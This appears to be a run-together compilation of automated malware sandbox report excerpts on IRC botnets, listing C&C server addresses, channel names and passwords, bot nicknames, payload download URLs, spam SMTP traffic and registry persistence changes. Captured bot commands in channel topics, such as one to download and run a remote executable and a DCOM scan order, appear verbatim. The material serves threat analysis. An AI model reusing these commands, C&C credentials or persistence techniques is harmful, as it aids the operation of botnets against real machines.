Host Name IP Address gt10.smo7he.com 61.147.67.177 Opened listening TCP connection on port: 18631 Opened listening TCP connection on port: 113 * C&C Server: 61.147.67.177:6161 * Server Password: * Username: laMer * Nickname: XPMdv4E * Channel: #kwt-team (Password: #191#) * Channeltopic: hosting infos: http://whois.domaintools.com/61.147.67.177

Host Name IP Addressana.smo7he.net 95.128.242.245dell-d3e62f7e26 10.1.14.2alkeichah.com alkeichah.com 72.35.84.6u1.k129129.com UDP ConnectionsRemote IP Address: 95.128.242.245 Port: 1975Send Datagram: packet(s) of size 7Send Datagram: 2 packet(s) of size 3Send Datagram: packet(s) of size 49Send Datagram: packet(s) of size 58Send Datagram: packet(s) of size 1Recv Datagram: 6329 packet(s) of size 0Recv Datagram: packet(s) of size 8Recv Datagram: 2 packet(s)Read more...

Remote Host Port Number66.252.5.47 700072.35.84.6 80 * The data identified by the following URL was then requested from the remote web server: o http://alkeichah.com/881.exe NICK jcljatvxJOIN #usb trb50QUIT gettin new bin.NICK dpzgprmiUSER dpzgprmi * 0 :COMPUTERNAMEMODE dpzgprmi +ixUSER jcljatvx * 0 :COMPUTERNAMEMODE jcljatvx +ix Other details * The following port was open in the system:Read more...

Remote Host Port Number72.184.196.76 6667 NICK XP|00|USA|SP2|4653USER jddgw 0 0 :XP|00|USA|SP2|4653USERHOST XP|00|USA|SP2|4653MODE XP|00|USA|SP2|4653 +x+iBJOIN #eckoPRIVMSG #ecko :12Password accepted12Type commandlist12[PSTORE]: Starting Pstore.12[PSTORE]: Pstore Started.PONG :1F6819DC Other details * The following ports were open in the system: Port Protocol Process113 TCP msconfig.exe (%System%msconfig.exe)1052 TCP msconfig.exe (%System%msconfig.exe) Registry Modifications * The following Registry Keys were created: o [pathnameRead more...

Host Name IP Addressdell-d3e62f7e26 10.1.2.2xdetras.dyndns.info 109.123.66.112 * C&C Server: 109.123.66.112:6667 * Server Password: * Username: XP-5750 * Nickname: [DEU|00|P|03462] * Channel: #nuevos# (Password: mariano) * Channeltopic: : Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “winlogin” = winlogin.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “winlogin” = winlogin.exeHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:1.exe” = c:1.exe:*:Enabled:winloginHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active”Read more...

bnetnew.helohmar.com 98.126.18.10Outgoing connection to remote server: bnetnew.helohmar.com TCP port 8800SMTP: 65.55.37.88:25 * SMTP: 74.6.136.65:25 * Username / Password: / SMTP: 65.55.92.152:25SMTP: 65.55.37.104:25SMTP: 65.54.188.72:25SMTP: 65.55.92.152:25SMTP: 65.54.188.110:25 * SMTP: 209.191.88.254:25 * Username / Password: / Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeHKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Tjmm71” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeReads HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogonRead more...

67.43.232.36:8080Nick: FpNYgjKTVUsername: ngyccnJoined Channel: #rstn2Channel Topic for Channel #rstn2: “* ipscan s.s.s dcom2 -f -s” other chanels Now talking in ##xddcTopic On: [ ##xddc ] [=t0Y0F21DYX4e6UWiqOP9ZY0vX4MOFnQpiS67nAcB1uLbI7sg33T9PIBDhDk/qm5 ]Topic By: [ m1244 ]Modes On: [ ##xddc ] [ +smntSMCu ] Now talking in #xddc1Topic On: [ #xddc1 ] [13 * download http://idfc.info/bnew.exe -e -f -s ]Topic By:Read more...

72.10.169.26:2293Nick: akjHdYdPUsername: tpepiyJoined Channel: #siwaChannel Topic for Channel #siwa: “=XRlSYWHDxodKoKTdT7BxKpedXm7GERdOTvU41sULBVo0tVz3vs9al15JIViw”

Remote Host Port Number58.30.17.229 8080 NICK {NEW-USA-XP-SXYOQB}USER USA “” “lol” :USAJOIN #!RapePONG :ghostnet.ghostmarket.net Other details * The following port was open in the system: Port Protocol Process1052 TCP File.exe (%UserProfile%File.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Microsoft Drive Guard32 = “%UserProfile%File.exe” so that File.exe runs every time Windows startsRead more...

74.81.64.25 (2345)#info [21:41] [BRA|00|D|33418]: [IM]: Thread Activated: Sending Message With Email.